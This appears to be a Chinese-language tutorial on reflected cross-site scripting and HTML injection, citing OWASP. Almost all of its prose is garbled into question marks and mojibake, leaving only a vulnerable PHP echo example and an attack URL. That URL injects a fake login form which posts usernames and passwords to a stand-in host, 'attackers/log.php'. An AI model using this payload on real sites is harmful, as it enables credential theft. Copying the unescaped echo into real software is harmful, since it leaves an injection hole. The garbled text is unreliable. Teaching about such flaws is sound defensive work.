????????????

???????????????????????????????????????????÷??????????ù???????????????????????????????????????????????????web???????????????佨???????ι????????????????????????????????????????
????OWASP???????????????????????????????????????????????????????????????????????????????????????????????????????Щ????￡?????????????????????????????????????????????????????е????
????Web??ó?????????????????????????????1??????????web??ó???????????????????Σ????????????????綯?HTML????????д????????????????α??????????????cookies????????????
?????????????XSS???????
??????OWASP??????????XSS???????????????XSS??????<script>????????????????JS???????????????????????????????????XSS???????????????????????????????????????????2???????????????
????????????????????
??????????????????
???????????????????????????????????
????????????????URL????URL??????????????????????????Щ?????
??????????????ε?????????????????????з????
?????????????????????????HTML?????????????????????????
??????????????????????????????????????
?????????PHP???????HTML????????
????Form.html
????</pre>
????<h1> INFOSEC INSTITUTE</h1>
????<form action=”get”>
????<b>Enter your name: </b>
????<input type=”text” name=”name” />
????<input type=”submit” value=”submit name” />
????</form>
????<pre>
???????Ч???????

????Name.php
????<!–?php $name = $_REQUEST ['name']; ?–></pre>
????<h1>Welcome to Infosec Institute</h1>
????<pre>
????Hello?? <!–?php echo $name; ?–>!
????How can we help you ?
???????Ч???????

??????????get???????? name??namp.php????????????????????????????????URL??
????ocalhost/name.php?name=Bhavesh<form action=”http://attackers/log.php” method=”post”>Username<input type=”text” name=”user”><br>password<input type=”password” name=”pass”><input type=”submit”></form>

??????????????????????????????HTML?????????????????????????????????????????????????????????????log.php.